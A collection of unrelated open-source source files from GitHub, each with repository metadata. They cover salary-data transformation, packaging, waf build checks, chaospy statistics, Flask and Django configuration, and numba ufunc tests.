    ORGANIZATION_CLASSIFICATION = 'University'

    # How do they track gender? We need to map what they use to `F` and `M`.
    # gender_map = {'F': 'F', 'M': 'M'}

    # Source spreadsheet for this import.
    URL = ('https://s3.amazonaws.com/raw.texastribune.org/'
           'university_houston/salaries/2019-03/campuses.xlsx')

    # Agency ethnicity codes -> display names.
    race_map = {
        'AMIND': 'American Indian',
        'ASIAN': 'Asian',
        'BLACK': 'Black',
        'HISPA': 'Hispanic',
        'NSPEC': 'Not Specified',
        'WHITE': 'White',
        'PACIF': 'Pacific Islander',
        'NHISP': 'Not Hispanic',
        '': 'Not Specified'
    }

    # Agency campus codes -> campus display names.
    campus_map = {
        'HR730': 'University of Houston',
        'HR759': 'University of Houston-Clear Lake',
        'HR765': 'University of Houston-Victoria',
        'HR783': 'University of Houston System',
        'HR784': 'University of Houston-Downtown',
    }

    DATE_PROVIDED = date(2019, 3, 2)
    # Y/M/D agency provided the data

    @property
    def is_valid(self):
        # Adjust to return False on invalid fields. For example:
        return self.full_name.strip() != ''

    @property
    def organization(self):
        """Organization payload: campus display name, department as child,
        and site classification."""
        r = {
            'name': self.campus_map[self.campus.strip()],
            'children': self.department_as_child,
            'classification': self.ORGANIZATION_CLASSIFICATION,
        }
        return r

    @property
    def person(self):
        """Split the full name (via the mixin's get_name) into person fields."""
        name = self.get_name()
        r = {
            'family_name': name.last,
            'given_name': name.first,
            'additional_name': name.middle,
            'name': unicode(name),  # Python 2 builtin
            'gender': self.gender.strip()
        }
        return r

    @property
    def description(self):
        # Full/Part column: 'F' = full-time, 'P' = part-time.
        employee_type = self.employee_type
        if employee_type == 'F':
            return "Annual salary"
        if employee_type == 'P':
            return "Part-time annual salary"

    @property
    def race(self):
        return {
            'name': self.race_map[self.nationality.strip()]
        }

    @property
    def compensation_type(self):
        employee_type = self.employee_type
        if employee_type == 'F':
            return 'FT'
        if employee_type == 'P':
            return 'PT'

    @property
    def department(self):
        dept = self.get_mapped_value('department')
        return dept

    @property
    def job_title(self):
        job = self.get_mapped_value('job_title')
        return job
transform = base.transform_factory(TransformedRecord)
| {
"content_hash": "e8fe0d82e3472e1420cbd2030a1c75db",
"timestamp": "",
"source": "github",
"line_count": 135,
"max_line_length": 76,
"avg_line_length": 26.696296296296296,
"alnum_prop": 0.5790788013318535,
"repo_name": "texastribune/tx_salaries",
"id": "7454b440ad42a46610d4397d5b1f507359900ad9",
"size": "3604",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tx_salaries/utils/transformers/university_of_houston.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "309280"
},
{
"name": "Ruby",
"bytes": "191"
}
],
"symlink_target": ""
} |
import unittest
from sklearn import datasets
class Test(unittest.TestCase):
    """Smoke test for the bundled scikit-learn iris example dataset."""

    def testIrisDataset(self):
        iris = datasets.load_iris()
        instance_count = len(iris.data)
        self.assertEqual(150,
                         instance_count,
                         "The dataset shall contain 150 instances")
# Allow running this module directly with the standard unittest runner.
if __name__ == "__main__":
    # import sys;sys.argv = ['', 'Test.testIrisDataset']
    unittest.main()
| {
"content_hash": "bbde33c427874089e90ee2cc3c5eb4fd",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 67,
"avg_line_length": 24.4375,
"alnum_prop": 0.578005115089514,
"repo_name": "sixninetynine/pygradle",
"id": "d098eff8fe5f0903b3a39e31c9e1cd8d29465d84",
"size": "391",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/iris-classification/test/test_dataset.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Go",
"bytes": "216"
},
{
"name": "Groovy",
"bytes": "242974"
},
{
"name": "Java",
"bytes": "219226"
},
{
"name": "Python",
"bytes": "16278"
},
{
"name": "Shell",
"bytes": "203"
}
],
"symlink_target": ""
} |
"""
setup routine
"""
from setuptools import setup, find_packages
import os
def read(*paths):
    """Build a file path from *paths* and return the file's contents."""
    full_path = os.path.join(*paths)
    with open(full_path, 'r') as handle:
        return handle.read()
# Packaging manifest; install with `pip install .`.
setup(
    # Metadata
    name='forseti',
    version='0.8.1',
    description='Formal Logic Framework',
    long_description=read('README.rst'),
    url='https://github.com/MasterOdin/forseti',
    download_url='https://pypi.python.org/pypi/forseti',
    license='MIT',
    author='Matthew Peveler',
    author_email='matt.peveler@gmail.com',
    # PyPI trove classifiers.
    # NOTE(review): 'Operating System :: OS Independent' is listed twice.
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Intended Audience :: Science/Research',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: 3.4',
        'Operating System :: OS Independent',
        'Topic :: Scientific/Engineering :: Mathematics',
    ],
    # Contents
    packages=find_packages(exclude=['tests*']),
)
| {
"content_hash": "89dfcedb6cf749f23856bc1953fbfc6f",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 65,
"avg_line_length": 27.930232558139537,
"alnum_prop": 0.6186511240632806,
"repo_name": "MasterOdin/forseti",
"id": "638ace8dee48cbcf4b8671f915c3fffd91dfc544",
"size": "1223",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "74093"
}
],
"symlink_target": ""
} |
import os
import smtplib
from email.mime.text import MIMEText
DEFAULT_SUBJECT_PREFIX = "[SEND] "
def send(fname, conf):
contents = open(fname).read()
msg = MIMEText(contents)
msg['Subject'] = DEFAULT_SUBJECT_PREFIX + os.path.basename(fname) + "..."
msg['From'] = conf['from']
msg['To'] = conf['to']
server = smtplib.SMTP(conf['server'])
server.ehlo()
server.starttls()
server.ehlo()
try:
server.login(conf['from'], conf['internal'])
server.sendmail(msg['From'], [msg['To']], msg.as_string())
except smtplib.SMTPAuthenticationError:
print "[ERROR] Email Authentication"
server.close()
| {
"content_hash": "f8c419d52995f216f26f62be2d19bcbd",
"timestamp": "",
"source": "github",
"line_count": 22,
"max_line_length": 77,
"avg_line_length": 29.90909090909091,
"alnum_prop": 0.6306990881458967,
"repo_name": "buckheroux/send",
"id": "d1decf695ee93b37feb032d251eae4f7c26695d7",
"size": "658",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "send/agent/semail.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "3024"
}
],
"symlink_target": ""
} |
"""
Various configuration tests.
"""
from waflib import Task
from waflib.Configure import conf
from waflib.TaskGen import feature, before_method, after_method
import sys
# C sources for the link test: a shared library exporting lib_func(), and a
# program that links against it and exits 0 only when lib_func() returns 9.
LIB_CODE = '''
#ifdef _MSC_VER
#define testEXPORT __declspec(dllexport)
#else
#define testEXPORT
#endif
testEXPORT int lib_func(void) { return 9; }
'''

MAIN_CODE = '''
#ifdef _MSC_VER
#define testEXPORT __declspec(dllimport)
#else
#define testEXPORT
#endif
testEXPORT int lib_func(void);
int main(int argc, char **argv) {
(void)argc; (void)argv;
return !(lib_func() == 9);
}
'''
@feature('link_lib_test')
@before_method('process_source')
def link_lib_test_fun(self):
    """
    The configuration test :py:func:`waflib.Tools.ccroot.run_c_code` declares a unique task generator,
    so we need to create other task generators from here to check if the linker is able to link libraries.
    """
    def write_test_file(task):
        # Dump the generator's 'code' attribute into the target source file.
        task.outputs[0].write(task.generator.code)

    rpath = []
    if getattr(self, 'add_rpath', False):
        rpath = [self.bld.path.get_bld().abspath()]

    mode = self.mode
    m = '%s %s' % (mode, mode)
    ex = self.test_exec and 'test_exec' or ''
    bld = self.bld
    # Four generators: write both sources, build the shared lib, then the
    # program that links against it (optionally executed via 'test_exec').
    bld(rule=write_test_file, target='test.' + mode, code=LIB_CODE)
    bld(rule=write_test_file, target='main.' + mode, code=MAIN_CODE)
    bld(features='%sshlib' % m, source='test.' + mode, target='test')
    bld(features='%sprogram %s' % (m, ex), source='main.' + mode, target='app', use='test', rpath=rpath)
@conf
def check_library(self, mode=None, test_exec=True):
    """Verify the current toolchain can build and link shared libraries.

    Uses :py:func:`waflib.Tools.c_tests.link_lib_test_fun`.

    :param mode: c or cxx or d
    :type mode: string
    """
    if not mode:
        # Default to the C++ toolchain when one is configured.
        mode = 'cxx' if self.env.CXX else 'c'
    self.check(
        compile_filename=[],
        features='link_lib_test',
        msg='Checking for libraries',
        mode=mode,
        test_exec=test_exec,
    )
########################################################################################

# Template used by check_inline: declares both a static and an external
# function with the candidate inline keyword substituted in twice.
INLINE_CODE = '''
typedef int foo_t;
static %s foo_t static_foo () {return 0; }
%s foo_t foo () {
return 0;
}
'''
# Candidate keywords, tried in order of preference.
INLINE_VALUES = ['inline', '__inline__', '__inline']
@conf
def check_inline(self, **kw):
    """
    Check for the right value for the inline macro.

    Defines INLINE_MACRO to 1 if the define is found.
    If the inline macro is not 'inline', adds a define to the ``config.h``
    (#define inline __inline__).

    :param define_name: define INLINE_MACRO by default to 1 if the macro is defined
    :type define_name: string
    :param features: by default *c* or *cxx* depending on the compiler present
    :type features: list of string
    """
    self.start_msg('Checking for inline')

    if not 'define_name' in kw:
        kw['define_name'] = 'INLINE_MACRO'
    if not 'features' in kw:
        if self.env.CXX:
            kw['features'] = ['cxx']
        else:
            kw['features'] = ['c']

    # Try each candidate keyword until one compiles.
    for x in INLINE_VALUES:
        kw['fragment'] = INLINE_CODE % (x, x)

        try:
            self.check(**kw)
        except self.errors.ConfigurationError:
            continue
        else:
            self.end_msg(x)
            if x != 'inline':
                # Make plain 'inline' usable by aliasing it in config.h.
                self.define('inline', x, quote=False)
            return x
    self.fatal('could not use inline functions')
########################################################################################

# Program exits 0 only when off_t is at least 64 bits wide.
LARGE_FRAGMENT = '''#include <unistd.h>
int main(int argc, char **argv) {
(void)argc; (void)argv;
return !(sizeof(off_t) >= 8);
}
'''
@conf
def check_large_file(self, **kw):
    """
    Check for large file support and define the macro HAVE_LARGEFILE.

    The test is skipped on win32 systems (DEST_BINFMT == pe).

    :param define_name: define to set, by default *HAVE_LARGEFILE*
    :type define_name: string
    :param execute: execute the test (yes by default)
    :type execute: bool
    """
    if not 'define_name' in kw:
        kw['define_name'] = 'HAVE_LARGEFILE'
    if not 'execute' in kw:
        kw['execute'] = True

    if not 'features' in kw:
        if self.env.CXX:
            kw['features'] = ['cxx', 'cxxprogram']
        else:
            kw['features'] = ['c', 'cprogram']

    kw['fragment'] = LARGE_FRAGMENT

    kw['msg'] = 'Checking for large file support'
    ret = True
    # First try: does it work without any extra defines?
    try:
        if self.env.DEST_BINFMT != 'pe':
            ret = self.check(**kw)
    except self.errors.ConfigurationError:
        pass
    else:
        if ret:
            return True

    # Second try: retry with the glibc-style feature macro.
    kw['msg'] = 'Checking for -D_FILE_OFFSET_BITS=64'
    kw['defines'] = ['_FILE_OFFSET_BITS=64']
    try:
        ret = self.check(**kw)
    except self.errors.ConfigurationError:
        pass
    else:
        self.define('_FILE_OFFSET_BITS', 64)
        return ret

    self.fatal('There is no support for large files')
########################################################################################

# The arrays below spell out 'LiTTleEnDian' or 'BIGenDianSyS' in the compiled
# object file depending on byte order; grep_for_endianness scans for them.
ENDIAN_FRAGMENT = '''
short int ascii_mm[] = { 0x4249, 0x4765, 0x6E44, 0x6961, 0x6E53, 0x7953, 0 };
short int ascii_ii[] = { 0x694C, 0x5454, 0x656C, 0x6E45, 0x6944, 0x6E61, 0 };
int use_ascii (int i) {
return ascii_mm[i] + ascii_ii[i];
}
short int ebcdic_ii[] = { 0x89D3, 0xE3E3, 0x8593, 0x95C5, 0x89C4, 0x9581, 0 };
short int ebcdic_mm[] = { 0xC2C9, 0xC785, 0x95C4, 0x8981, 0x95E2, 0xA8E2, 0 };
int use_ebcdic (int i) {
return ebcdic_mm[i] + ebcdic_ii[i];
}
extern int foo;
'''
class grep_for_endianness(Task.Task):
    """Scan a compiled object file for the endianness marker strings and
    record the result on the task generator's ``tmp`` list."""
    color = 'PINK'
    def run(self):
        txt = self.inputs[0].read(flags='rb').decode('iso8859-1')
        if txt.find('LiTTleEnDian') > -1:
            self.generator.tmp.append('little')
        elif txt.find('BIGenDianSyS') > -1:
            self.generator.tmp.append('big')
        else:
            # Neither marker found: signal task failure.
            return -1
@feature('grep_for_endianness')
@after_method('process_source')
def grep_for_endianness_fun(self):
    # Attach the grep task to the object file produced by the compile step.
    self.create_task('grep_for_endianness', self.compiled_tasks[0].outputs[0])
@conf
def check_endianness(self):
    """
    Execute a configuration test to determine the endianness.

    :return: 'little' or 'big'
    """
    tmp = []
    def check_msg(self):
        # okmsg callable: evaluated after the task ran, once tmp is filled.
        return tmp[0]
    self.check(fragment=ENDIAN_FRAGMENT, features='c grep_for_endianness', msg="Checking for endianness", define='ENDIANNESS', tmp=tmp, okmsg=check_msg)
    return tmp[0]
| {
"content_hash": "1aecc2aa7e21edd2db9f2ace13d94cf7",
"timestamp": "",
"source": "github",
"line_count": 222,
"max_line_length": 149,
"avg_line_length": 26.16216216216216,
"alnum_prop": 0.6389462809917356,
"repo_name": "tommo/gii",
"id": "db1826fd5149f4b96308c860b81de0c60ab2e99f",
"size": "5875",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "support/waf/waflib/Tools/c_tests.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "398"
},
{
"name": "C",
"bytes": "1118982"
},
{
"name": "C++",
"bytes": "743466"
},
{
"name": "CSS",
"bytes": "5956"
},
{
"name": "HTML",
"bytes": "126233"
},
{
"name": "JavaScript",
"bytes": "129855"
},
{
"name": "Lua",
"bytes": "1290198"
},
{
"name": "Makefile",
"bytes": "652"
},
{
"name": "Objective-C",
"bytes": "28896"
},
{
"name": "Objective-C++",
"bytes": "129214"
},
{
"name": "Python",
"bytes": "2676186"
},
{
"name": "Shell",
"bytes": "11215"
}
],
"symlink_target": ""
} |
"""Variance operator."""
import numpy
import numpoly
from .expected import E
def Var(poly, dist=None, **kws):
    """
    The variance of a distribution or polynomial.

    Computed as ``E[(poly - E[poly])**2]``.

    Args:
        poly (numpoly.ndpoly, Distribution):
            Input to take variance on.
        dist (Distribution):
            Defines the space the variance is taken on. It is ignored if
            ``poly`` is a distribution.

    Returns:
        (numpy.ndarray):
            Element for element variance along ``poly``, where
            ``variation.shape == poly.shape``.

    Examples:
        >>> dist = chaospy.J(chaospy.Gamma(1, 1), chaospy.Normal(0, 2))
        >>> chaospy.Var(dist)
        array([1., 4.])
        >>> q0, q1 = chaospy.variable(2)
        >>> poly = chaospy.polynomial([1, q0, q1, 10*q0*q1])
        >>> chaospy.Var(poly, dist)
        array([ 0., 1., 4., 800.])
        >>> chaospy.Var(2., dist)
        array(0.)
    """
    if dist is None:
        # A distribution was passed directly: measure the identity polynomial.
        dist, poly = poly, numpoly.variable(len(poly))
    poly = numpoly.set_dimensions(poly, len(dist))
    if poly.isconstant():
        # Constants carry no randomness, so the variance is exactly zero.
        return numpy.zeros(poly.shape)
    centered = poly - E(poly, dist, **kws)
    return E(numpoly.square(centered), dist, **kws)
| {
"content_hash": "7cf03513cc4447b58602698a51991ad5",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 72,
"avg_line_length": 28.651162790697676,
"alnum_prop": 0.5592532467532467,
"repo_name": "jonathf/chaospy",
"id": "55f24342565c78ee0fa639080f9af391788484f3",
"size": "1232",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "chaospy/descriptives/variance.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "959784"
}
],
"symlink_target": ""
} |
from synergine.test.TestSuite import TestSuite as BaseTestSuite
from tests.simulation.TestSimulation import TestSimulation
from tests.core.connection.TestTerminal import TestTerminal
from tests.core.TestActionManager import TestActionManager
from tests.core.TestConfigurationManager import TestConfigurationManager
from tests.test.TestCycleCallback import TestCycleCallback
class TestSuite(BaseTestSuite):
    """Aggregates the project's test cases into a single suite."""

    def __init__(self):
        super().__init__()
        # Registration order is preserved exactly as before.
        cases = [
            TestConfigurationManager,
            TestActionManager,
            TestSimulation,
            TestTerminal,
            TestCycleCallback,
        ]
        self.add_test_cases(cases)
| {
"content_hash": "157d9bddeadf3cdc828458c95ea23139",
"timestamp": "",
"source": "github",
"line_count": 14,
"max_line_length": 103,
"avg_line_length": 43.785714285714285,
"alnum_prop": 0.7862969004893964,
"repo_name": "buxx/synergine",
"id": "a5f8363a4933ff7a85c0d903fc674dbbe1520594",
"size": "613",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/TestSuite.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "85069"
}
],
"symlink_target": ""
} |
from smartshark.models import Job, Plugin, Project, PluginExecution
from smartshark.datacollection.pluginmanagementinterface import PluginManagementInterface
from django.core.management.base import BaseCommand
class Command(BaseCommand):
    """Fetch Logs for set of jobs and filter them for certain keywords."""
    help = 'Filter job logs'
    def add_arguments(self, parser):
        # Positional args: plugin (optionally "name=version"), project, job state,
        # which log stream to search, and the substring to look for.
        parser.add_argument('plugin_name', type=str, help='Name of the plugin, Version can be used with = e.g., coastSHARK=1.03')
        parser.add_argument('project_name', type=str)
        parser.add_argument('filter_state', type=str, help='Select only Jobs with this state.')
        parser.add_argument('filter_log_type', type=str, help='Log type (error, output).')
        parser.add_argument('filter_string', type=str, help='String to filter in job logs.')
        parser.add_argument('--execute', action='store_true', dest='execute', help='Really execute the operation.')
    def handle(self, *args, **options):
        # Resolve the plugin, honoring an optional "name=version" spec.
        tmp = options['plugin_name'].split('=')
        if len(tmp) > 1:
            plugin_name = tmp[0]
            plugin_version = tmp[1]
            plugin = Plugin.objects.get(name__icontains=plugin_name, version=plugin_version)
        else:
            plugin = Plugin.objects.get(name__icontains=options['plugin_name'])
        project = Project.objects.get(name__icontains=options['project_name'])
        # NOTE(review): order_by('submitted_at')[0] picks the EARLIEST execution —
        # confirm this is intended rather than the most recent one.
        pe = PluginExecution.objects.filter(plugin=plugin, project=project).order_by('submitted_at')[0]
        self.stdout.write('looking in pluginexecution from: {}'.format(pe.submitted_at))
        # Job states are stored upper-case, so normalize the CLI value.
        jobs = Job.objects.filter(plugin_execution=pe, status=options['filter_state'].upper())
        if not options['execute']:
            self.stdout.write('not executing, to execute operation run with --execute')
        h = 'Searching for {} in {} logs of {} jobs with state {} for plugin {} on project {}'.format(options['filter_string'], options['filter_log_type'], len(jobs), options['filter_state'], plugin.name, project.name)
        self.stdout.write(h)
        interface = PluginManagementInterface.find_correct_plugin_manager()
        if options['execute']:
            # Partition job revisions by whether the filter string appears in
            # the selected log stream.
            found_revs = []
            notfound_revs = []
            for job in jobs:
                output = []
                if options['filter_log_type'] == 'error':
                    output = interface.get_error_log(job)
                if options['filter_log_type'] == 'output':
                    output = interface.get_output_log(job)
                if output:
                    # Logs come back as a list of lines; join for substring search.
                    output = '\n'.join(output)
                # Empty output (or unknown log type) falls through to "not found".
                if options['filter_string'] in output:
                    found_revs.append(job.revision_hash)
                else:
                    notfound_revs.append(job.revision_hash)
            self.stdout.write('String found in {} of {} jobs'.format(len(found_revs), len(jobs)))
            # Print whichever revision list is shorter to keep output readable.
            if len(notfound_revs) < len(found_revs):
                self.stdout.write('not found: {}'.format(','.join(notfound_revs)))
            else:
                self.stdout.write('found: {}'.format(','.join(found_revs)))
| {
"content_hash": "a087d12ae3a7bd96a53019db48c5d527",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 218,
"avg_line_length": 46.80597014925373,
"alnum_prop": 0.6128826530612245,
"repo_name": "smartshark/serverSHARK",
"id": "4b23bd73c7ee1c23abc16ba25d504588bf96e24f",
"size": "3183",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "smartshark/management/commands/filter_job_logs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "66094"
},
{
"name": "HTML",
"bytes": "40562"
},
{
"name": "JavaScript",
"bytes": "1056"
},
{
"name": "Jinja",
"bytes": "4515"
},
{
"name": "Less",
"bytes": "78481"
},
{
"name": "Python",
"bytes": "267732"
},
{
"name": "Ruby",
"bytes": "5037"
},
{
"name": "SCSS",
"bytes": "79489"
}
],
"symlink_target": ""
} |
from flask import Blueprint, current_app, session, g, redirect, url_for
mod = Blueprint('home', __name__, url_prefix="/<lang_code>")
@mod.url_defaults
def add_language_code(endpoint, values):
    """Inject the session's language code into generated URLs for this blueprint."""
    lang = session['lang_code']
    if current_app.url_map.is_endpoint_expecting(endpoint, 'lang_code'):
        values['lang_code'] = lang
    g.lang_code = lang
    values.setdefault('lang_code', lang)
@mod.url_value_preprocessor
def pull_lang_code(endpoint, values):
    """Strip the lang_code URL component and stash it in the session and ``g``."""
    code = values.pop('lang_code')
    session['lang_code'] = code
    g.lang_code = session.get('lang_code', None)
@mod.route('/change/<new_lang_code>')
def change(new_lang_code):
    """Switch the session language and redirect back to the home page."""
    session['lang_code'] = new_lang_code
    target = url_for('home.index')
    return redirect(target)
| {
"content_hash": "bd955a23ac686bca00925af80abebc89",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 72,
"avg_line_length": 30.416666666666668,
"alnum_prop": 0.6753424657534246,
"repo_name": "nMustaki/flask-usul",
"id": "030da5d08416bd0233f3bea28cfdf61800bcffe5",
"size": "754",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/blueprints/home/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "453"
},
{
"name": "HTML",
"bytes": "8782"
},
{
"name": "JavaScript",
"bytes": "702"
},
{
"name": "Python",
"bytes": "14441"
}
],
"symlink_target": ""
} |
import os
from .base import *
# Production overrides on top of base settings; DEBUG must stay off in production.
DEBUG = False
## DATABASE SETTINGS
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
# NOTE(review): ENGINE is the incomplete prefix 'django.db.backends.' — a real
# backend (e.g. 'django.db.backends.postgresql_psycopg2') and credentials must
# be filled in here or via local_settings before deploying.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.',
        'NAME': '',
        'USER': '',
        'PASSWORD': '',
        'HOST': '',
        'PORT': '',
    },
}
# IMPORTANT!:
# You must keep this secret, you can store it in an
# environment variable and set it with:
# export SECRET_KEY="phil-dunphy98!-bananas12"
# https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/#secret-key
# Intentionally raises KeyError at startup if SECRET_KEY is not exported.
SECRET_KEY = os.environ['SECRET_KEY']
## WSGI SETTINGS
# https://docs.djangoproject.com/en/1.8/ref/settings/#wsgi-application
WSGI_APPLICATION = 'recipe.wsgi.application'
## NOTIFICATIONS
# A tuple that lists people who get code error notifications.
# https://docs.djangoproject.com/en/1.8/ref/settings/#admins
ADMINS = (
    ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
## DJANGO-COMPRESSOR SETTINGS
# NOTE(review): section header has no settings beneath it — either add the
# compressor settings or drop the heading.
# Machine-specific overrides; star-import is the conventional Django
# local_settings pattern and is deliberately optional.
try:
    from local_settings import *
except ImportError:
    pass
| {
"content_hash": "bb5ee18fe9d2b46e949a3ffa8fa18b90",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 78,
"avg_line_length": 24.232558139534884,
"alnum_prop": 0.663147792706334,
"repo_name": "jajadinimueter/recipe",
"id": "c810758fbc79112ed837a89f296f76cd089aa90c",
"size": "1042",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "recipe/settings/production.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "164557"
},
{
"name": "HTML",
"bytes": "9722"
},
{
"name": "JavaScript",
"bytes": "80277"
},
{
"name": "Nginx",
"bytes": "4758"
},
{
"name": "Python",
"bytes": "50623"
},
{
"name": "XQuery",
"bytes": "1463"
}
],
"symlink_target": ""
} |
from __future__ import print_function, absolute_import, division
import sys
import numpy as np
from numba import config, unittest_support as unittest
from numba.npyufunc.ufuncbuilder import GUFuncBuilder
from numba import vectorize, guvectorize
from numba.npyufunc import PyUFunc_One
from numba.npyufunc.dufunc import DUFunc as UFuncBuilder
from ..support import tag, TestCase
def add(a, b):
    """An addition"""
    # NOTE: the docstring above is asserted verbatim elsewhere in this module
    # (assertIn("An addition", ufunc.__doc__)) — do not reword it.
    return a + b
def equals(a, b):
    """Element-wise equality kernel used to build boolean-returning ufuncs."""
    result = a == b
    return result
def mul(a, b):
    """A multiplication"""
    # Kernel compiled via vectorize() in the tests below; the docstring becomes
    # the resulting ufunc's __doc__.
    return a * b
def guadd(a, b, c):
    """A generalized addition"""
    # Writes a + b into the out-parameter c, element by element.
    # (Docstring above is asserted verbatim by the gufunc metadata tests.)
    rows, cols = c.shape
    for row in range(rows):
        for col in range(cols):
            c[row, col] = a[row, col] + b[row, col]
@vectorize(nopython=True)
def inner(a, b):
    # Implicitly-typed (lazy) ufunc: signatures are inferred on first call.
    return a + b
@vectorize(["int64(int64, int64)"], nopython=True)
def inner_explicit(a, b):
return a + b
def outer(a, b):
    # Calls the implicitly-typed ufunc `inner` from inside another ufunc kernel.
    return inner(a, b)
def outer_explicit(a, b):
    # Calls the explicitly-typed ufunc `inner_explicit` from another kernel.
    return inner_explicit(a, b)
class Dummy:
    """Empty class; instantiating it inside a kernel forces numba into object mode."""
def guadd_obj(a, b, c):
    """Generalized addition that cannot compile in nopython mode."""
    Dummy()  # to force object mode
    rows, cols = c.shape
    for row in range(rows):
        for col in range(cols):
            c[row, col] = a[row, col] + b[row, col]
def guadd_scalar_obj(a, b, c):
    """Generalized addition of a scalar to a matrix, forced into object mode."""
    Dummy()  # to force object mode
    rows, cols = c.shape
    for row in range(rows):
        for col in range(cols):
            c[row, col] = a[row, col] + b
class MyException(Exception):
    """Sentinel exception raised by `guerror` to test error propagation."""
def guerror(a, b, c):
    # Always raises; verifies that exceptions propagate out of object-mode gufuncs.
    raise MyException
class TestUfuncBuilding(TestCase):
    """Tests for element-wise ufunc building (DUFunc/UFuncBuilder):
    signature registration, nopython vs. object mode, and nested calls."""
    # Multiple signatures on one builder; both must compile in nopython mode,
    # and the result must preserve dtype and handle non-contiguous input.
    @tag('important')
    def test_basic_ufunc(self):
        ufb = UFuncBuilder(add)
        cres = ufb.add("int32(int32, int32)")
        self.assertFalse(cres.objectmode)
        cres = ufb.add("int64(int64, int64)")
        self.assertFalse(cres.objectmode)
        ufunc = ufb.build_ufunc()
        def check(a):
            b = ufunc(a, a)
            self.assertTrue(np.all(a + a == b))
            self.assertEqual(b.dtype, a.dtype)
        a = np.arange(12, dtype='int32')
        check(a)
        # Non-contiguous dimension
        a = a[::2]
        check(a)
        a = a.reshape((2, 3))
        check(a)
        # Metadata
        self.assertEqual(ufunc.__name__, "add")
        self.assertIn("An addition", ufunc.__doc__)
    # Structured (complex) dtypes must also compile in nopython mode.
    def test_ufunc_struct(self):
        ufb = UFuncBuilder(add)
        cres = ufb.add("complex64(complex64, complex64)")
        self.assertFalse(cres.objectmode)
        ufunc = ufb.build_ufunc()
        def check(a):
            b = ufunc(a, a)
            self.assertTrue(np.all(a + a == b))
            self.assertEqual(b.dtype, a.dtype)
        a = np.arange(12, dtype='complex64') + 1j
        check(a)
        # Non-contiguous dimension
        a = a[::2]
        check(a)
        a = a.reshape((2, 3))
        check(a)
    # forceobj=True must yield an object-mode compile result that still works.
    def test_ufunc_forceobj(self):
        ufb = UFuncBuilder(add, targetoptions={'forceobj': True})
        cres = ufb.add("int32(int32, int32)")
        self.assertTrue(cres.objectmode)
        ufunc = ufb.build_ufunc()
        a = np.arange(10, dtype='int32')
        b = ufunc(a, a)
        self.assertTrue(np.all(a + a == b))
    def test_nested_call(self):
        """
        Check nested call to an implicitly-typed ufunc.
        """
        builder = UFuncBuilder(outer,
                               targetoptions={'nopython': True})
        builder.add("(int64, int64)")
        ufunc = builder.build_ufunc()
        self.assertEqual(ufunc(-1, 3), 2)
    def test_nested_call_explicit(self):
        """
        Check nested call to an explicitly-typed ufunc.
        """
        builder = UFuncBuilder(outer_explicit,
                               targetoptions={'nopython': True})
        builder.add("(int64, int64)")
        ufunc = builder.build_ufunc()
        self.assertEqual(ufunc(-1, 3), 2)
class TestUfuncBuildingJitDisabled(TestUfuncBuilding):
    """Re-run TestUfuncBuilding with JIT compilation globally disabled.

    Fix: setUp previously assigned ``config.DISABLE_JIT = False`` — the
    default — which made this subclass an exact duplicate of its parent.
    The class exists to verify ufunc building still works when the JIT is
    turned off, so the flag must be set to True here.
    """

    def setUp(self):
        # Remember the previous setting so tearDown can restore it.
        self.old_disable_jit = config.DISABLE_JIT
        config.DISABLE_JIT = True

    def tearDown(self):
        config.DISABLE_JIT = self.old_disable_jit
class TestGUfuncBuilding(TestCase):
    """Tests for generalized-ufunc building via GUFuncBuilder."""
    # Basic (x,y),(x,y)->(x,y) gufunc in nopython mode; also checks metadata.
    def test_basic_gufunc(self):
        gufb = GUFuncBuilder(guadd, "(x, y),(x, y)->(x, y)")
        cres = gufb.add("void(int32[:,:], int32[:,:], int32[:,:])")
        self.assertFalse(cres.objectmode)
        ufunc = gufb.build_ufunc()
        a = np.arange(10, dtype="int32").reshape(2, 5)
        b = ufunc(a, a)
        self.assertTrue(np.all(a + a == b))
        self.assertEqual(b.dtype, np.dtype('int32'))
        # Metadata
        self.assertEqual(ufunc.__name__, "guadd")
        self.assertIn("A generalized addition", ufunc.__doc__)
    @tag('important')
    def test_gufunc_struct(self):
        # Complex dtype must still compile in nopython mode.
        gufb = GUFuncBuilder(guadd, "(x, y),(x, y)->(x, y)")
        cres = gufb.add("void(complex64[:,:], complex64[:,:], complex64[:,:])")
        self.assertFalse(cres.objectmode)
